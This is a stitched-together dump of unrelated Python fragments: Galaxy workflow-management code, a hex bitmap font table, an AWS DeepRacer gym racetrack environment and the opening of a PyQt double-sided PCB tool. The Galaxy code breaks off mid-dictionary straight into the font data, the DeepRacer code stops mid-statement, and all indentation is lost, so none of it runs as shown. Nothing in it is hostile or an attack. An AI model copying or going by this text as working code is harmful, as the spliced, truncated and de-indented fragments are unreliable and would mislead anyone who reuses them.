try:
stored_workflow = trans.sa_session.query(
self.app.model.StoredWorkflow
).get( decoded_stored_workflow_id )
except Exception:
raise exceptions.ObjectNotFound()
self.check_security( trans, stored_workflow, check_ownership=True, check_accessible=False )
return trans.sa_session.query(
model.WorkflowInvocation
).filter_by(
workflow_id=stored_workflow.latest_workflow_id
)
CreatedWorkflow = namedtuple("CreatedWorkflow", ["stored_workflow", "missing_tools"])
class WorkflowContentsManager(UsesAnnotations):
def build_workflow_from_dict(
self,
trans,
data,
source=None,
add_to_menu=False,
publish=False
):
# Put parameters in workflow mode
trans.workflow_building_mode = True
# Create new workflow from incoming dict
workflow = model.Workflow()
# If there's a source, put it in the workflow name.
if source:
name = "%s (imported from %s)" % ( data['name'], source )
else:
name = data['name']
workflow.name = name
if 'uuid' in data:
workflow.uuid = data['uuid']
# Assume no errors until we find a step that has some
workflow.has_errors = False
# Create each step
steps = []
# The editor will provide ids for each step that we don't need to save,
# but do need to use to make connections
steps_by_external_id = {}
# Keep track of tools required by the workflow that are not available in
# the local Galaxy instance. Each tuple in the list of missing_tool_tups
# will be ( tool_id, tool_name, tool_version ).
missing_tool_tups = []
for step_dict in self.__walk_step_dicts( data ):
module, step = self.__module_from_dict( trans, step_dict, secure=False )
steps.append( step )
steps_by_external_id[ step_dict['id' ] ] = step
if module.type == 'tool' and module.tool is None:
# A required tool is not available in the local Galaxy instance.
missing_tool_tup = ( step_dict[ 'tool_id' ], step_dict[ 'name' ], step_dict[ 'tool_version' ] )
if missing_tool_tup not in missing_tool_tups:
missing_tool_tups.append( missing_tool_tup )
# Save the entire step_dict in the unused config field, to be parsed later
# when we do have the tool
step.config = json.dumps(step_dict)
if step.tool_errors:
workflow.has_errors = True
# Second pass to deal with connections between steps
self.__connect_workflow_steps( steps, steps_by_external_id )
# Order the steps if possible
attach_ordered_steps( workflow, steps )
# Connect up
stored = model.StoredWorkflow()
stored.name = workflow.name
workflow.stored_workflow = stored
stored.latest_workflow = workflow
stored.user = trans.user
stored.published = publish
if data[ 'annotation' ]:
annotation = sanitize_html( data[ 'annotation' ], 'utf-8', 'text/html' )
self.add_item_annotation( trans.sa_session, stored.user, stored, annotation )
# Persist
trans.sa_session.add( stored )
trans.sa_session.flush()
if add_to_menu:
if trans.user.stored_workflow_menu_entries is None:
trans.user.stored_workflow_menu_entries = []
menuEntry = model.StoredWorkflowMenuEntry()
menuEntry.stored_workflow = stored
trans.user.stored_workflow_menu_entries.append( menuEntry )
trans.sa_session.flush()
return CreatedWorkflow(
stored_workflow=stored,
missing_tools=missing_tool_tups
)
def update_workflow_from_dict(self, trans, stored_workflow, workflow_data, from_editor=False):
# Put parameters in workflow mode
trans.workflow_building_mode = True
# Convert incoming workflow data from json if coming from editor
data = json.loads(workflow_data) if from_editor else workflow_data
# Create new workflow from incoming data
workflow = model.Workflow()
# Just keep the last name (user can rename later)
workflow.name = stored_workflow.name
# Assume no errors until we find a step that has some
workflow.has_errors = False
# Create each step
steps = []
# The editor will provide ids for each step that we don't need to save,
# but do need to use to make connections
steps_by_external_id = {}
errors = []
for key, step_dict in data['steps'].iteritems():
is_tool = is_tool_module_type( step_dict[ 'type' ] )
if is_tool and not trans.app.toolbox.has_tool( step_dict['tool_id'], exact=True ):
errors.append("Step %s requires tool '%s'." % (step_dict['id'], step_dict['tool_id']))
if errors:
raise MissingToolsException(workflow, errors)
# First pass to build step objects and populate basic values
for step_dict in self.__walk_step_dicts( data ):
module, step = self.__module_from_dict( trans, step_dict, secure=from_editor )
# Create the model class for the step
steps.append( step )
steps_by_external_id[ step_dict['id' ] ] = step
if 'workflow_outputs' in step_dict:
for output_name in step_dict['workflow_outputs']:
m = model.WorkflowOutput(workflow_step=step, output_name=output_name)
trans.sa_session.add(m)
if step.tool_errors:
# DBTODO Check for conditional inputs here.
workflow.has_errors = True
# Second pass to deal with connections between steps
self.__connect_workflow_steps( steps, steps_by_external_id )
# Order the steps if possible
attach_ordered_steps( workflow, steps )
# Connect up
workflow.stored_workflow = stored_workflow
stored_workflow.latest_workflow = workflow
# Persist
trans.sa_session.flush()
# Return something informative
errors = []
if workflow.has_errors:
errors.append( "Some steps in this workflow have validation errors" )
if workflow.has_cycles:
errors.append( "This workflow contains cycles" )
return workflow, errors
def workflow_to_dict( self, trans, stored, style="export" ):
""" Export the workflow contents to a dictionary ready for JSON-ification and to be
sent out via API for instance. There are three styles of export allowed: 'export', 'instance', and
'editor'. The Galaxy team will do its best to preserve the backward compatibility of the
'export' style - this is the export method meant to be portable across Galaxy instances and over
time. The 'editor' style is subject to rapid and unannounced changes. The 'instance' export
option describes the workflow in a context more tied to the current Galaxy instance and includes
fields like 'url' and actual unencoded step ids instead of 'order_index'.
"""
if style == "editor":
return self._workflow_to_dict_editor( trans, stored )
elif style == "instance":
return self._workflow_to_dict_instance( trans, stored )
else:
return self._workflow_to_dict_export( trans, stored )
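# Illustrative call (variable names are hypothetical):
#   wf_dict = workflow_contents_manager.workflow_to_dict(trans, stored_workflow, style="instance")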
def _workflow_to_dict_editor(self, trans, stored):
"""
"""
workflow = stored.latest_workflow
# Pack workflow data into a dictionary and return
data = {}
data['name'] = workflow.name
data['steps'] = {}
data['upgrade_messages'] = {}
# For each step, rebuild the form and encode the state
for step in workflow.steps:
# Load from database representation
module = module_factory.from_workflow_step( trans, step )
if not module:
step_annotation = self.get_item_annotation_obj( trans.sa_session, trans.user, step )
annotation_str = ""
if step_annotation:
annotation_str = step_annotation.annotation
invalid_tool_form_html = """<div class="toolForm tool-node-error">
<div class="toolFormTitle form-row-error">Unrecognized Tool: %s</div>
<div class="toolFormBody"><div class="form-row">
The tool id '%s' for this tool is unrecognized.<br/><br/>
To save this workflow, you will need to delete this step or enable the tool.
</div></div></div>""" % (step.tool_id, step.tool_id)
step_dict = {
'id': step.order_index,
'type': 'invalid',
'tool_id': step.tool_id,
'name': 'Unrecognized Tool: %s' % step.tool_id,
'tool_state': None,
'tooltip': None,
'tool_errors': ["Unrecognized Tool Id: %s" % step.tool_id],
'data_inputs': [],
'data_outputs': [],
'form_html': invalid_tool_form_html,
O O O O
0x19, 0x30, # OO O OO
0x07, 0xC0, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @8142 '¾' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x07, 0xC0, # OOOOO
0x19, 0x30, # OO O OO
0x29, 0x28, # O O O O O
0x41, 0x04, # O O O
0x61, 0x0C, # OO O OO
0x81, 0x02, # O O O
0x81, 0x02, # O O O
0xC1, 0x06, # OO O OO
0x87, 0x02, # O OOO O
0x88, 0x02, # O O O
0x60, 0x0C, # OO OO
0x40, 0x04, # O O
0x28, 0x28, # O O O O
0x19, 0x30, # OO O OO
0x07, 0xC0, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @8188 '¿' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x07, 0xC0, # OOOOO
0x19, 0x30, # OO O OO
0x29, 0x28, # O O O O O
0x41, 0x04, # O O O
0x61, 0x0C, # OO O OO
0x81, 0x02, # O O O
0x81, 0x02, # O O O
0xDF, 0x86, # OO OOOOOO OO
0x81, 0x02, # O O O
0x80, 0x02, # O O
0x60, 0x0C, # OO OO
0x40, 0x04, # O O
0x28, 0x28, # O O O O
0x19, 0x30, # OO O OO
0x07, 0xC0, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @8234 'À' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x07, 0xC0, # OOOOO
0x19, 0x30, # OO O OO
0x29, 0x28, # O O O O O
0x41, 0x04, # O O O
0x61, 0x0C, # OO O OO
0x89, 0x02, # O O O O
0x87, 0x02, # O OOO O
0xC1, 0x06, # OO O OO
0x81, 0x02, # O O O
0x80, 0x02, # O O
0x60, 0x0C, # OO OO
0x40, 0x04, # O O
0x28, 0x28, # O O O O
0x19, 0x30, # OO O OO
0x07, 0xC0, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @8280 'Á' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x07, 0xC0, # OOOOO
0x19, 0x30, # OO O OO
0x29, 0x28, # O O O O O
0x41, 0x04, # O O O
0x65, 0x0C, # OO O O OO
0x83, 0x02, # O OO O
0x83, 0x02, # O OO O
0xC1, 0x06, # OO O OO
0x81, 0x02, # O O O
0x80, 0x02, # O O
0x60, 0x0C, # OO OO
0x40, 0x04, # O O
0x28, 0x28, # O O O O
0x19, 0x30, # OO O OO
0x07, 0xC0, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @8326 'Â' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x07, 0xC0, # OOOOO
0x19, 0x30, # OO O OO
0x29, 0x28, # O O O O O
0x41, 0x04, # O O O
0x61, 0x0C, # OO O OO
0x81, 0x02, # O O O
0x81, 0x02, # O O O
0xC1, 0x06, # OO O OO
0x81, 0x02, # O O O
0x80, 0x02, # O O
0x60, 0x0C, # OO OO
0x40, 0x04, # O O
0x28, 0x28, # O O O O
0x19, 0x30, # OO O OO
0x07, 0xC0, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @8372 'Ã' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x42, # O O
0x00, 0x66, # OO OO
0x00, 0x5A, # O OO O
0x00, 0x42, # O O
0x00, 0x42, # O O
0x04, 0x42, # O O O
0x0C, 0x42, # OO O O
0x1C, 0x44, # OOO O O
0x37, 0xFC, # OO OOOOOOOOO
0x60, 0x18, # OO OO
0xC0, 0x30, # OO OO
0xC0, 0x60, # OO OO
0x60, 0xC0, # OO OO
0x37, 0x00, # OO OOO
0x1C, 0x00, # OOO
0x0C, 0x00, # OO
0x04, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
# @8418 'Ä' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x84, 0x00, # O O
0xCC, 0x00, # OO OO
0xB4, 0x00, # O OO O
0x84, 0x00, # O O
0x84, 0x00, # O O
0x84, 0x40, # O O O
0x84, 0x60, # O O OO
0x44, 0x70, # O O OOO
0x7F, 0xD8, # OOOOOOOOO OO
0x30, 0x0C, # OO OO
0x18, 0x06, # OO OO
0x0C, 0x06, # OO OO
0x06, 0x0C, # OO OO
0x01, 0xD8, # OOO OO
0x00, 0x70, # OOO
0x00, 0x60, # OO
0x00, 0x40, # O
0x00, 0x00, #
0x00, 0x00, #
# @8464 'Å' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x04, 0x00, # O
0x0C, 0x00, # OO
0x1C, 0x00, # OOO
0x37, 0x00, # OO OOO
0x60, 0xC0, # OO OO
0xC0, 0x60, # OO OO
0xC0, 0x30, # OO OO
0x60, 0x18, # OO OO
0x37, 0xFC, # OO OOOOOOOOO
0x1C, 0x44, # OOO O O
0x0C, 0x42, # OO O O
0x04, 0x42, # O O O
0x00, 0x42, # O O
0x00, 0x42, # O O
0x00, 0x5A, # O OO O
0x00, 0x66, # OO OO
0x00, 0x42, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @8510 'Æ' (15 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x40, # O
0x00, 0x60, # OO
0x00, 0x70, # OOO
0x01, 0xD8, # OOO OO
0x06, 0x0C, # OO OO
0x0C, 0x06, # OO OO
0x18, 0x06, # OO OO
0x30, 0x0C, # OO OO
0x7F, 0xD8, # OOOOOOOOO OO
0x44, 0x70, # O O OOO
0x84, 0x60, # O O OO
0x84, 0x40, # O O O
0x84, 0x00, # O O
0x84, 0x00, # O O
0xB4, 0x00, # O OO O
0xCC, 0x00, # OO OO
0x84, 0x00, # O O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @8556 'Ç' (17 pixels wide)
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
0x00, 0x00, 0x00, #
0x06, 0x00, 0x00, # OO
0x0F, 0x00, 0x00, # OOOO
0x19, 0x80, 0x00, # OO OO
0x30, 0xC0, 0x00, # OO OO
0x60, 0x60, 0x00, # OO OO
0xF0, | |
# File: simulation/aws-robomaker-sample-application-deepracer/simulation_ws/src/sagemaker_rl_agent/markov/environments/deepracer_racetrack_env.py
from __future__ import print_function
import bisect
import boto3
import json
import logging
import math
import os
import time
import gym
import numpy as np
from gym import spaces
from PIL import Image
logger = logging.getLogger(__name__)
# Type of worker
SIMULATION_WORKER = "SIMULATION_WORKER"
SAGEMAKER_TRAINING_WORKER = "SAGEMAKER_TRAINING_WORKER"
node_type = os.environ.get("NODE_TYPE", SIMULATION_WORKER)
if node_type == SIMULATION_WORKER:
import rospy
from ackermann_msgs.msg import AckermannDriveStamped
from gazebo_msgs.msg import ModelState
from gazebo_msgs.srv import GetLinkState, GetModelState, SetModelState
from scipy.spatial.transform import Rotation
from sensor_msgs.msg import Image as sensor_image
from shapely.geometry import Point, Polygon
from shapely.geometry.polygon import LinearRing, LineString
# Type of job
TRAINING_JOB = 'TRAINING'
EVALUATION_JOB = 'EVALUATION'
# Sleep intervals
SLEEP_AFTER_RESET_TIME_IN_SECOND = 0.5
SLEEP_BETWEEN_ACTION_AND_REWARD_CALCULATION_TIME_IN_SECOND = 0.1
SLEEP_WAITING_FOR_IMAGE_TIME_IN_SECOND = 0.01
# Dimensions of the input training image
TRAINING_IMAGE_SIZE = (160, 120)
# Local offset of the front of the car
RELATIVE_POSITION_OF_FRONT_OF_CAR = [0.14, 0, 0]
# Normalized track distance to move with each reset
ROUND_ROBIN_ADVANCE_DIST = 0.05
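# For example, 0.05 advances the start point by 5% of the normalized track per
# reset, so training cycles through 20 evenly spaced start positions (see
# finish_episode, where start_dist wraps around with "% 1.0").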
# Reward to give the car when it "crashes"
CRASHED = 1e-8
### Gym Env ###
class DeepRacerRacetrackEnv(gym.Env):
def __init__(self):
# Create the observation space
img_width = TRAINING_IMAGE_SIZE[0]
img_height = TRAINING_IMAGE_SIZE[1]
self.observation_space = spaces.Box(low=0, high=255, shape=(img_height, img_width, 3), dtype=np.uint8)
# Create the action space
self.action_space = spaces.Box(low=np.array([-1, 0]), high=np.array([+1, +1]), dtype=np.float32)
if node_type == SIMULATION_WORKER:
# ROS initialization
rospy.init_node('rl_coach', anonymous=True)
rospy.Subscriber('/camera/zed/rgb/image_rect_color', sensor_image, self.callback_image)
self.ack_publisher = rospy.Publisher('/vesc/low_level/ackermann_cmd_mux/output',
AckermannDriveStamped, queue_size=100)
self.set_model_state = rospy.ServiceProxy('/gazebo/set_model_state', SetModelState)
self.get_model_state = rospy.ServiceProxy('/gazebo/get_model_state', GetModelState)
self.get_link_state = rospy.ServiceProxy('/gazebo/get_link_state', GetLinkState)
# Read in parameters
self.world_name = rospy.get_param('WORLD_NAME')
self.job_type = rospy.get_param('JOB_TYPE')
self.aws_region = rospy.get_param('AWS_REGION')
self.metrics_s3_bucket = rospy.get_param('METRICS_S3_BUCKET')
self.metrics_s3_object_key = rospy.get_param('METRICS_S3_OBJECT_KEY')
self.metrics = []
self.simulation_job_arn = 'arn:aws:robomaker:' + self.aws_region + ':' + \
rospy.get_param('ROBOMAKER_SIMULATION_JOB_ACCOUNT_ID') + \
':simulation-job/' + rospy.get_param('AWS_ROBOMAKER_SIMULATION_JOB_ID')
if self.job_type == TRAINING_JOB:
from custom_files.customer_reward_function import reward_function
self.reward_function = reward_function
self.metric_name = rospy.get_param('METRIC_NAME')
self.metric_namespace = rospy.get_param('METRIC_NAMESPACE')
self.training_job_arn = rospy.get_param('TRAINING_JOB_ARN')
self.target_number_of_episodes = rospy.get_param('NUMBER_OF_EPISODES')
self.target_reward_score = rospy.get_param('TARGET_REWARD_SCORE')
else:
from markov.defaults import reward_function
self.reward_function = reward_function
self.number_of_trials = 0
self.target_number_of_trials = rospy.get_param('NUMBER_OF_TRIALS')
# Read in the waypoints
BUNDLE_CURRENT_PREFIX = os.environ.get("BUNDLE_CURRENT_PREFIX", None)
if not BUNDLE_CURRENT_PREFIX:
raise ValueError("Cannot get BUNDLE_CURRENT_PREFIX")
route_file_name = os.path.join(BUNDLE_CURRENT_PREFIX,
'install', 'deepracer_simulation', 'share',
'deepracer_simulation', 'routes', '{}.npy'.format(self.world_name))
waypoints = np.load(route_file_name)
self.is_loop = np.all(waypoints[0,:] == waypoints[-1,:])
if self.is_loop:
self.center_line = LinearRing(waypoints[:,0:2])
self.inner_border = LinearRing(waypoints[:,2:4])
self.outer_border = LinearRing(waypoints[:,4:6])
self.road_poly = Polygon(self.outer_border, [self.inner_border])
else:
self.center_line = LineString(waypoints[:,0:2])
self.inner_border = LineString(waypoints[:,2:4])
self.outer_border = LineString(waypoints[:,4:6])
self.road_poly = Polygon(np.vstack((self.outer_border, np.flipud(self.inner_border))))
self.center_dists = [self.center_line.project(Point(p), normalized=True) for p in self.center_line.coords[:-1]] + [1.0]
self.track_length = self.center_line.length
# Initialize state data
self.episodes = 0
self.start_dist = 0.0
self.round_robin = (self.job_type == TRAINING_JOB)
self.is_simulation_done = False
self.image = None
self.steering_angle = 0
self.speed = 0
self.action_taken = 0
self.prev_progress = 0
self.prev_point = Point(0, 0)
self.prev_point_2 = Point(0, 0)
self.next_state = None
self.reward = None
self.reward_in_episode = 0
self.done = False
self.steps = 0
self.simulation_start_time = 0
self.reverse_dir = False
def reset(self):
if node_type == SAGEMAKER_TRAINING_WORKER:
return self.observation_space.sample()
# Simulation is done - so RoboMaker will start to shut down the app.
# Until RoboMaker shuts the app down, do nothing more, else metrics may show unexpected data.
if (node_type == SIMULATION_WORKER) and self.is_simulation_done:
while True:
time.sleep(1)
self.image = None
self.steering_angle = 0
self.speed = 0
self.action_taken = 0
self.prev_progress = 0
self.prev_point = Point(0, 0)
self.prev_point_2 = Point(0, 0)
self.next_state = None
self.reward = None
self.reward_in_episode = 0
self.done = False
# Reset the car and record the simulation start time
self.send_action(0, 0)
self.racecar_reset()
time.sleep(SLEEP_AFTER_RESET_TIME_IN_SECOND)
self.steps = 0
self.simulation_start_time = time.time()
# Compute the initial state
self.infer_reward_state(0, 0)
return self.next_state
def racecar_reset(self):
rospy.wait_for_service('/gazebo/set_model_state')
# Compute the starting position and heading
next_point_index = bisect.bisect(self.center_dists, self.start_dist)
start_point = self.center_line.interpolate(self.start_dist, normalized=True)
start_yaw = math.atan2(
self.center_line.coords[next_point_index][1] - start_point.y,
self.center_line.coords[next_point_index][0] - start_point.x)
start_quaternion = Rotation.from_euler('zyx', [start_yaw, 0, 0]).as_quat()
# Construct the model state and send to Gazebo
modelState = ModelState()
modelState.model_name = 'racecar'
modelState.pose.position.x = start_point.x
modelState.pose.position.y = start_point.y
modelState.pose.position.z = 0
modelState.pose.orientation.x = start_quaternion[0]
modelState.pose.orientation.y = start_quaternion[1]
modelState.pose.orientation.z = start_quaternion[2]
modelState.pose.orientation.w = start_quaternion[3]
modelState.twist.linear.x = 0
modelState.twist.linear.y = 0
modelState.twist.linear.z = 0
modelState.twist.angular.x = 0
modelState.twist.angular.y = 0
modelState.twist.angular.z = 0
self.set_model_state(modelState)
def step(self, action):
if node_type == SAGEMAKER_TRAINING_WORKER:
return self.observation_space.sample(), 0, False, {}
# Initialize next state, reward, done flag
self.next_state = None
self.reward = None
self.done = False
# Send this action to Gazebo and increment the step count
self.steering_angle = float(action[0])
self.speed = float(action[1])
self.send_action(self.steering_angle, self.speed)
time.sleep(SLEEP_BETWEEN_ACTION_AND_REWARD_CALCULATION_TIME_IN_SECOND)
self.steps += 1
# Compute the next state and reward
self.infer_reward_state(self.steering_angle, self.speed)
return self.next_state, self.reward, self.done, {}
def callback_image(self, data):
self.image = data
def send_action(self, steering_angle, speed):
ack_msg = AckermannDriveStamped()
ack_msg.header.stamp = rospy.Time.now()
ack_msg.drive.steering_angle = steering_angle
ack_msg.drive.speed = speed
self.ack_publisher.publish(ack_msg)
def infer_reward_state(self, steering_angle, speed):
rospy.wait_for_service('/gazebo/get_model_state')
rospy.wait_for_service('/gazebo/get_link_state')
# Wait until we have an image from the camera
# btown TODO: Incorporate feedback from callejae@ here (CR-6434645 rev1)
while not self.image:
time.sleep(SLEEP_WAITING_FOR_IMAGE_TIME_IN_SECOND)
# Read model state from Gazebo
model_state = self.get_model_state('racecar', '')
model_orientation = Rotation.from_quat([
model_state.pose.orientation.x,
model_state.pose.orientation.y,
model_state.pose.orientation.z,
model_state.pose.orientation.w])
model_location = np.array([
model_state.pose.position.x,
model_state.pose.position.y,
model_state.pose.position.z]) + \
model_orientation.apply(RELATIVE_POSITION_OF_FRONT_OF_CAR)
model_point = Point(model_location[0], model_location[1])
model_heading = model_orientation.as_euler('zyx')[0]
# Read the wheel locations from Gazebo
left_rear_wheel_state = self.get_link_state('racecar::left_rear_wheel', '')
left_front_wheel_state = self.get_link_state('racecar::left_front_wheel', '')
right_rear_wheel_state = self.get_link_state('racecar::right_rear_wheel', '')
right_front_wheel_state = self.get_link_state('racecar::right_front_wheel', '')
wheel_points = [
Point(left_rear_wheel_state.link_state.pose.position.x,
left_rear_wheel_state.link_state.pose.position.y),
Point(left_front_wheel_state.link_state.pose.position.x,
left_front_wheel_state.link_state.pose.position.y),
Point(right_rear_wheel_state.link_state.pose.position.x,
right_rear_wheel_state.link_state.pose.position.y),
Point(right_front_wheel_state.link_state.pose.position.x,
right_front_wheel_state.link_state.pose.position.y)
]
# Project the current location onto the center line and find nearest points
current_dist = self.center_line.project(model_point, normalized=True)
next_waypoint_index = max(0, min(bisect.bisect(self.center_dists, current_dist), len(self.center_dists) - 1))
prev_waypoint_index = next_waypoint_index - 1
distance_from_next = model_point.distance(Point(self.center_line.coords[next_waypoint_index]))
distance_from_prev = model_point.distance(Point(self.center_line.coords[prev_waypoint_index]))
closest_waypoint_index = (prev_waypoint_index, next_waypoint_index)[distance_from_next < distance_from_prev]
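# The boolean indexes the tuple (False -> 0, True -> 1): when the car is closer
# to the next waypoint, next_waypoint_index is selected as the closest one.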
# Compute distance from center and road width
nearest_point_center = self.center_line.interpolate(current_dist, normalized=True)
nearest_point_inner = self.inner_border.interpolate(self.inner_border.project(nearest_point_center))
nearest_point_outer = self.outer_border.interpolate(self.outer_border.project(nearest_point_center))
distance_from_center = nearest_point_center.distance(model_point)
distance_from_inner = nearest_point_inner.distance(model_point)
distance_from_outer = nearest_point_outer.distance(model_point)
track_width = nearest_point_inner.distance(nearest_point_outer)
is_left_of_center = (distance_from_outer < distance_from_inner) if self.reverse_dir \
else (distance_from_inner < distance_from_outer)
# Convert current progress to be [0,100] starting at the initial waypoint
current_progress = current_dist - self.start_dist
if current_progress < 0.0: current_progress = current_progress + 1.0
current_progress = 100 * current_progress
if current_progress < self.prev_progress:
# Either: (1) we wrapped around and have finished the track,
delta1 = current_progress + 100 - self.prev_progress
# or (2) for some reason the car went backwards (this should be rare)
delta2 = self.prev_progress - current_progress
current_progress = (self.prev_progress, 100)[delta1 < delta2]
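# Worked example (illustrative numbers): prev_progress = 95, current_progress = 3
#   delta1 = 3 + 100 - 95 = 8   (small: most likely we wrapped past the start line)
#   delta2 = 95 - 3 = 92        (large: driving this far backwards is unlikely)
#   delta1 < delta2, so the tuple index picks 100 and the lap counts as complete.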
# Car is off track if all wheels are outside the borders
wheel_on_track = [self.road_poly.contains(p) for p in wheel_points]
all_wheels_on_track = all(wheel_on_track)
any_wheels_on_track = any(wheel_on_track)
# Compute the reward
if any_wheels_on_track:
done = False
params = {
'all_wheels_on_track': all_wheels_on_track,
'x': model_point.x,
'y': model_point.y,
'heading': model_heading * 180.0 / math.pi,
'distance_from_center': distance_from_center,
'progress': current_progress,
'steps': self.steps,
'speed': speed,
'steering_angle': steering_angle * 180.0 / math.pi,
'track_width': track_width,
'waypoints': list(self.center_line.coords),
'closest_waypoints': [prev_waypoint_index, next_waypoint_index],
'is_left_of_center': is_left_of_center,
'is_reversed': self.reverse_dir
}
reward = self.reward_function(params)
else:
done = True
reward = CRASHED
# Reset if the car position hasn't changed in the last 2 steps
if min(model_point.distance(self.prev_point), model_point.distance(self.prev_point_2)) <= 0.0001:
done = True
reward = CRASHED # stuck
# Simulation jobs are done when progress reaches 100
if current_progress >= 100:
done = True
# Keep data from the previous step around
self.prev_point_2 = self.prev_point
self.prev_point = model_point
self.prev_progress = current_progress
# Read the image and resize to get the state
image = Image.frombytes('RGB', (self.image.width, self.image.height), self.image.data, 'raw', 'RGB', 0, 1)
image = image.resize(TRAINING_IMAGE_SIZE, resample=2)
state = np.array(image)
# Set the next state, reward, and done flag
self.next_state = state
self.reward = reward
self.reward_in_episode += reward
self.done = done
# Trace logs to help us debug and visualize the training runs
# btown TODO: This should be written to S3, not to CWL.
stdout_ = 'SIM_TRACE_LOG:%d,%d,%.4f,%.4f,%.4f,%.2f,%.2f,%d,%.4f,%s,%s,%.4f,%d,%.2f,%s\n' % (
self.episodes, self.steps, model_location[0], model_location[1], model_heading,
self.steering_angle,
self.speed,
self.action_taken,
self.reward,
self.done,
all_wheels_on_track,
current_progress,
closest_waypoint_index,
self.track_length,
time.time())
print(stdout_)
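# Example of the resulting trace line (illustrative values), one CSV record per step:
#   SIM_TRACE_LOG:3,42,2.1500,0.8700,1.5708,0.25,0.80,0,1.0000,False,True,37.5000,18,17.71,1618033988.75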
# Terminate this episode when ready
if self.done and node_type == SIMULATION_WORKER:
self.finish_episode(current_progress)
def finish_episode(self, progress):
# Stop the car from moving
self.send_action(0, 0)
# Increment episode count, update start dist for round robin
self.episodes += 1
if self.round_robin:
self.start_dist = (self.start_dist + ROUND_ROBIN_ADVANCE_DIST) % 1.0
# Update metrics based on job type
if self.job_type == TRAINING_JOB:
self.send_reward_to_cloudwatch(self.reward_in_episode)
self.update_training_metrics()
self.write_metrics_to_s3()
if self.is_training_done():
self.cancel_simulation_job()
elif self.job_type == EVALUATION_JOB:
self.number_of_trials += 1
self.update_eval_metrics(progress)
self.write_metrics_to_s3()
if self.is_evaluation_done():
self.cancel_simulation_job()
def update_eval_metrics(self, progress):
eval_metric = {}
eval_metric['completion_percentage'] = int(progress)
eval_metric['metric_time'] = int(round(time.time() * | |
from PyQt5 import QtWidgets, QtCore, QtGui
from appTool import AppTool
from appGUI.GUIElements import RadioSet, FCDoubleSpinner, FCButton, FCComboBox, NumericalEvalTupleEntry, FCLabel
from numpy import Inf
from shapely.geometry import Point
from shapely import affinity
import logging
import gettext
import appTranslation as fcTranslate
import builtins
fcTranslate.apply_language('strings')
if '_' not in builtins.__dict__:
_ = gettext.gettext
log = logging.getLogger('base')
class DblSidedTool(AppTool):
def __init__(self, app):
AppTool.__init__(self, app)
self.decimals = self.app.decimals
self.canvas = self.app.plotcanvas
# #############################################################################
# ######################### Tool GUI ##########################################
# #############################################################################
self.ui = DsidedUI(layout=self.layout, app=self.app)
self.toolName = self.ui.toolName
self.mr = None
# ## Signals
self.ui.object_type_radio.activated_custom.connect(self.on_object_type)
self.ui.add_point_button.clicked.connect(self.on_point_add)
self.ui.add_drill_point_button.clicked.connect(self.on_drill_add)
self.ui.delete_drill_point_button.clicked.connect(self.on_drill_delete_last)
self.ui.box_type_radio.activated_custom.connect(self.on_combo_box_type)
self.ui.axis_location.group_toggle_fn = self.on_toggle_pointbox
self.ui.point_entry.textChanged.connect(lambda val: self.ui.align_ref_label_val.set_value(val))
self.ui.pick_hole_button.clicked.connect(self.on_pick_hole)
self.ui.mirror_button.clicked.connect(self.on_mirror)
self.ui.xmin_btn.clicked.connect(self.on_xmin_clicked)
self.ui.ymin_btn.clicked.connect(self.on_ymin_clicked)
self.ui.xmax_btn.clicked.connect(self.on_xmax_clicked)
self.ui.ymax_btn.clicked.connect(self.on_ymax_clicked)
self.ui.center_btn.clicked.connect(
lambda: self.ui.point_entry.set_value(self.ui.center_entry.get_value())
)
self.ui.create_alignment_hole_button.clicked.connect(self.on_create_alignment_holes)
self.ui.calculate_bb_button.clicked.connect(self.on_bbox_coordinates)
self.ui.reset_button.clicked.connect(self.set_tool_ui)
self.drill_values = ""
# will hold the Excellon object used for picking a hole as mirror reference
self.exc_hole_obj = None
# store the status of the grid
self.grid_status_memory = None
# set True if mouse events are locally connected
self.local_connected = False
def install(self, icon=None, separator=None, **kwargs):
AppTool.install(self, icon, separator, shortcut='Alt+D', **kwargs)
def run(self, toggle=True):
self.app.defaults.report_usage("Tool2Sided()")
if toggle:
# if the splitter is hidden, display it, else hide it but only if the current widget is the same
if self.app.ui.splitter.sizes()[0] == 0:
self.app.ui.splitter.setSizes([1, 1])
else:
try:
if self.app.ui.tool_scroll_area.widget().objectName() == self.toolName:
# if tab is populated with the tool but it does not have the focus, focus on it
if not self.app.ui.notebook.currentWidget() is self.app.ui.tool_tab:
# focus on Tool Tab
self.app.ui.notebook.setCurrentWidget(self.app.ui.tool_tab)
else:
self.app.ui.splitter.setSizes([0, 1])
except AttributeError:
pass
else:
if self.app.ui.splitter.sizes()[0] == 0:
self.app.ui.splitter.setSizes([1, 1])
AppTool.run(self)
self.set_tool_ui()
self.app.ui.notebook.setTabText(2, _("2-Sided Tool"))
def set_tool_ui(self):
self.reset_fields()
self.ui.point_entry.set_value("")
self.ui.alignment_holes.set_value("")
